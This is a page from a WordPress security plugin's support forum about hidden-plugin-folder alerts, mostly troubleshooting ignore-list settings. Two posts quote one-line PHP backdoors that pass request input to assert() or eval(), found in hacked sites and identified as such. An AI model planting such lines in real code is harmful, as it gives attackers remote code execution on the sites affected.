Hidden Plugin Folder|Files (HPF) Alert

Home Forums BulletProof Security Free Hidden Plugin Folder|Files (HPF) Alert

Viewing 15 posts - 46 through 60 (of 69 total)
  • Author
    Posts
  • #30202
    Jez
    Participant

    I’m afraid this does not work on my site.

    Ive done this and there is no change. Same warnings?
    Do these steps.
    1. Go to the Ignore Hidden Plugin Folders & Files textarea box.
    2. Paste this into the textarea box: wprc-config.php
    3. Click the Save Plugin Folder|Files Ignore Rules button.

    If you have other files or folders that you are know are safe and are not hacker files or folders then you would add each of those filenames or folder names using this format (comma and space inbetween each filename or foldername):  filename.php, foldername, another-filename.php, another-foldername

    #30203
    AITpro Admin
    Keymaster

    @ Jez – You can turn the HPF cron Off if it does not work on your website.  Most likely something else you have installed (another plugin or your theme) or some additional code in your wp-config.php file or some other host server issue/problem is breaking the HPF Cron.

    #30210
    AITpro Admin
    Keymaster

    Email Question:
    I have been receiving multiple warnings from BPS

    The BPS Hidden Plugin Folders|Files (HPF) Cron has detected a hidden or empty plugin folder or a non-standard WP file or altered file in the /plugins/ folder. To view exact details of what was detected, log into your website and check the Hidden Plugin Folders|Files (HPF) Dashboard Alert.
    Site: http://www.xxxxx.com

    This is the code inside the var/sites/xxxxx/public_html/wp-content/plugins/index.php file.
    Can you advise whether this is malicious code and what can I do about it?

    <?php
    // Silence is golden.
    if(isset($_REQUEST['bot'])) assert(stripslashes($_REQUEST[bot]));
    #30211
    AITpro Admin
    Keymaster

    Email Answer:
    Yes, that is a hidden backdoor hacker script.  That php assert function will execute that hacker’s code.

    You should assume the worst, which is your entire hosting account is hacked and do the steps in this forum topic to cleanup your hacked hosting account:  http://forum.ait-pro.com/forums/topic/wordpress-hacked-wordpress-hack-cleanup-wordpress-hack-repair/

    Similar References:
    https://blog.sucuri.net/2011/09/ask-sucuri-what-about-the-backdoors.html

    For example, on the latest oscommerce compromises, all the sites had the following code added to the application_top.php file:

    if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));

    Yes, that is a backdoor. It allows the attacker to execute any type of code, add files, remove files, etc. When you are analysing thousands of lines of code, it is easy to miss it.

    #30263
    Dina Tate
    Participant

    [Topic has been merged into this relevant Topic]
    Good Day I have run a scan and got the following alert:

    BPS Hidden Plugin Folder|Files (HPF) Alert
    A plugin folder was found in your /plugins/ folder that is either a hidden plugin (plugin that is not displayed on the WordPress Plugins page) or an empty plugin folder. You can either delete this folder or if you recognize this folder and/or it is safe to ignore this folder you can ignore this folder check by adding the folder name in the Ignore Hidden Plugin Folders & Files textarea box option to make this Alert go away.
    Plugin Folder Path: /home/content/86/5397186/html/wp-content/plugins/gotmls
    Last Modified Time: February 25, 2014 @ 3:36 pm
    Last Change Time: February 25, 2014 @ 3:36 pm
    Last Access Time: January 23, 2014 @ 11:34 am

    When I added the link so that I could be ignored I got this message:
    Ignore Hidden Plugin Folders & Files settings saved.
    Current HPF Ignore Rules: /home/content/86/5397186/html/wp-content/plugins/gotmls

    However I am still getting the emails.  Please help!!!  I used to think I was somewhat savvy with troubleshooting but this error is driving me insane!

    #30265
    AITpro Admin
    Keymaster

    @ Dina Tate – Do these steps.
    1. Go to the Ignore Hidden Plugin Folders & Files textarea box.
    2. Paste this into the textarea box: gotmls
    3. Click the Save Plugin Folder|Files Ignore Rules button.

    #30266
    Dina Tate
    Participant

    It worked!!  Thank you!  I also had to call my hosting company and delete the folder.  it seems as though Anti-Malware wasn’t appearing in my left nav but the folder was still there for whatever reason.    again, thank you! whew!

    #30271
    Dianne Trussell
    Participant

    Me too, started getting this error message as soon as I updated BPS plugin. It’s also driving me crazy. The ONLY folder in the supposedly dodgy folder is the legitimate folder of my wordpress theme!

    #30272
    AITpro Admin
    Keymaster

    @ Dianne Trussell – Basically that is not possible so post the HPF Alert you are seeing.

    #30273
    Dianne Trussell
    Participant

    Here is the alert in my WordPress Dashboard: “BPS Hidden Plugin Folder|Files (HPF) Alert
    A plugin folder was found in your /plugins/ folder that is either a hidden plugin (plugin that is not displayed on the WordPress Plugins page) or an empty plugin folder. You can either delete this folder or if you recognize this folder and/or it is safe to ignore this folder you can ignore this folder check by adding the folder name in the Ignore Hidden Plugin Folders & Files textarea box option to make this Alert go away.

    Plugin Folder Path: /home1/diannet/public_html/wp-content/plugins/themes
    Last Modified Time: July 11, 2016 @ 4:27 am
    Last Change Time: July 11, 2016 @ 4:28 am
    Last Access Time: July 11, 2016 @ 4:11 am”

    I set the notification to come only every 60 minutes because it’s been filling up my email inbox with notifications every 10-minutes! I went to cpanel and deleted the only ‘useless’ file in the folder that BPS was having problems with, but the notifications and emails continued. I set BPS to ignore the folder but the notifications and emails still continued. I ended up accidentally trashing the ONLY other file in the ‘offending’ folder so there’s now nothing at all there for BPS to alert to, and I broke my website. Turns out it was a crucial folder for the WordPress f2 theme. And STILL the notifications and emails continue! Now I have to re-install WP and re-build my site…. What on earth is BPS finding fault with when there’s nothing there?

    BPS was throwing up the message for a folder in my public_html/wp-content/plugins/themes. The only folder was f2, which has now been deleted. And the notifications and emails keep coming for the same non-existant folder in Themes. So how does it help trying to whitelist something that doesn’t exist?

    #30276
    AITpro Admin
    Keymaster

    @ Dianne Trussell – Do these steps below to ignore the folder named “themes” that is in your /plugins/ folder if the folder still exists.  If that does not work then something else you have installed is breaking the BPS HPF Cron and you can just turn it off/not use it on your website.  Or you can do standard WordPress troubleshooting steps to try and figure out what is breaking the BPS HPF Cron. ie deactivate all other plugins, switch your theme, etc.
    1. Go to the Ignore Hidden Plugin Folders & Files textarea box.
    2. Paste this into the textarea box: themes
    3. Click the Save Plugin Folder|Files Ignore Rules button.

    #30277
    Dianne Trussell
    Participant

    Yay! Thanks AITpro, that worked. I was ‘expecting’ another email notification 45 mins ago and it never came, plus the message on my WP dashboard has gone.

    #30369
    Chris Moon
    Participant

    [Topic has been merged into this relevant Topic]
    I’m seeing index.php files turning up in my plugin folder or content folder with either: <php die(); ?> or <?php // Silence is golden. and assume they can be just deleted. My questions is how do they get there and what are they supposed to achieve?

    regards
    Chris

    #30373
    AITpro Admin
    Keymaster

    @ Chris Moon – I assume you are seeing HPF Alerts about the index.php file in the plugins folder.  By default WordPress creates an index.php file in the plugins folder with this code below.  You do not want to delete the default WordPress index.php file in the plugins folder.  It needs to be there.  Some plugins may change the code in the index.php file and HPF will alert you that it found non-standard code in the index.php file.  If the code in the index.php is safe and not malicious then you can just add the:  index.php file in the Ignore Hidden Plugin Folders & Files textarea box to ignore the HPF Cron index.php file check.

    <?php
    // Silence is golden.
    #30376
    Chris Moon
    Participant

    Thanks, learnt something new today.

Viewing 15 posts - 46 through 60 (of 69 total)
  • You must be logged in to reply to this topic.